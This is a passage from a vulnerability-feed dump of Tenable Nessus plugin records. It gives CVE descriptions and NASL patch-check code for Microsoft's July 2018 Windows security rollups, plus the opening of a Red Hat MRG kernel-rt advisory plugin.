(CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338815.NASL", "href": "https://www.tenable.com/plugins/nessus/110981", "published": "2018-07-10T00:00:00", "title": "KB4338824: Windows 8.1 and Windows Server 2012 R2 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110981);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8242\",\n \"CVE-2018-8260\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8313\",\n \"CVE-2018-8314\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104629,\n 104631,\n 104634,\n 104636,\n 104637,\n 104638,\n 104648,\n 104652,\n 104664,\n 104665,\n 104666,\n 104667,\n 104668,\n 104669,\n 104670\n );\n script_xref(name:\"MSKB\", value:\"4338815\");\n script_xref(name:\"MSKB\", value:\"4338824\");\n script_xref(name:\"MSFT\", value:\"MS18-4338815\");\n script_xref(name:\"MSFT\", value:\"MS18-4338824\");\n\n script_name(english:\"KB4338824: Windows 8.1 and Windows Server 2012 R2 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338824\nor cumulative update 4338815. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338815/windows-81-update-kb4338815\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e0106ae8\");\n # https://support.microsoft.com/en-us/help/4338824/windows-81-update-kb4338824\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be1b803d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4338824 or Cumulative Update KB4338815.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338815', '4338824');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338815, 4338824])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:37:28", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338823\nor cumulative update 4338818. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338818.NASL", "href": "https://www.tenable.com/plugins/nessus/110982", "published": "2018-07-10T00:00:00", "title": "KB4338823: Windows 7 and Windows Server 2008 R2 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110982);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8242\",\n \"CVE-2018-8260\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8314\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104629,\n 104631,\n 104634,\n 104636,\n 104637,\n 104638,\n 104648,\n 104652,\n 104664,\n 104665,\n 104666,\n 104667,\n 104668,\n 104669\n );\n script_xref(name:\"MSKB\", value:\"4338823\");\n script_xref(name:\"MSKB\", value:\"4338818\");\n script_xref(name:\"MSFT\", value:\"MS18-4338823\");\n script_xref(name:\"MSFT\", value:\"MS18-4338818\");\n\n script_name(english:\"KB4338823: Windows 7 and Windows Server 2008 R2 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338823\nor cumulative update 4338818. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338823/windows-7-update-kb4338823\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?21aadb60\");\n # https://support.microsoft.com/en-us/help/4338818/windows-7-update-kb4338818\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d021f588\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4338823 or Cumulative Update KB4338818.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338823', '4338818');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338823, 4338818])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:20:41", "bulletinFamily": "scanner", "description": "Updated kernel-rt packages that fix several security issues and\nmultiple bugs are now available for Red Hat Enterprise MRG 2.3.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A buffer overflow flaw was found in the way UTF-8 characters were\nconverted to UTF-16 in the utf8s_to_utf16s() function of the Linux\nkernel", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2013-0566.NASL", "href": "https://www.tenable.com/plugins/nessus/76658", "published": "2014-07-22T00:00:00", "title": "RHEL 6 : MRG (RHSA-2013:0566)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0566. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76658);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/10/24 15:35:36\");\n\n script_cve_id(\"CVE-2012-2375\", \"CVE-2012-4530\", \"CVE-2013-1772\", \"CVE-2013-1773\");\n script_bugtraq_id(53615, 55878, 58118, 58200);\n script_xref(name:\"RHSA\", value:\"2013:0566\");\n\n script_name(english:\"RHEL 6 : MRG (RHSA-2013:0566)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel-rt packages that fix several security issues and\nmultiple bugs are now available for Red Hat Enterprise MRG 2.3.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* A buffer overflow flaw was found in the way UTF-8 characters were\nconverted to UTF-16 in the utf8s_to_utf16s() function of the Linux\nkernel's FAT file system implementation. A local user able to mount a\nFAT file system with the 'utf8=1' option could use this flaw to crash\nthe system or, potentially, to escalate their privileges.\n(CVE-2013-1773, Important)\n\n* It was found that the RHSA-2012:0333 update did not correctly fix\nthe CVE-2011-4131 issue. A malicious Network File System version 4\n(NFSv4) server could return a crafted reply to a GETACL request,\ncausing a denial of service on the client. (CVE-2012-2375, Moderate)\n\n* A memory disclosure flaw was found in the way the load_script()\nfunction in the binfmt_script binary format handler handled excessive\nrecursions. A local, unprivileged user could use this flaw to leak\nkernel stack memory to user-space by executing specially crafted\nscripts. (CVE-2012-4530, Low)\n\n* A flaw was found in the way file permission checks for the\n'/dev/kmsg' file were performed in restricted root environments (for\nexample, when using a capability-based security model). A local user\nable to write to this file could cause a denial of service.\n(CVE-2013-1772, Low)\n\nThe CVE-2012-2375 issue was discovered by Jian Li of Red Hat.\n\nThis update also fixes multiple bugs. Documentation for these changes\nwill be available shortly from the Technical Notes document linked to\nin the References section.\n\nUsers should upgrade to these updated packages, which upgrade the\nkernel-rt kernel to version kernel-rt-3.6.11-rt28, correct these\nissues, and fix the bugs noted in the Red Hat Enterprise MRG 2\nTechnical Notes. The system must be rebooted for this update to take\neffect.\"\n );\n # https://rhn.redhat.com/errata/RHSA-2012-0333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0333\"\n );\n # https://access.redhat.com/knowledge/docs/en-US/Red_Hat_Enterprise_MRG/2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9345c1b9\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0566\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-2375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-4530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1772\"\n );\n 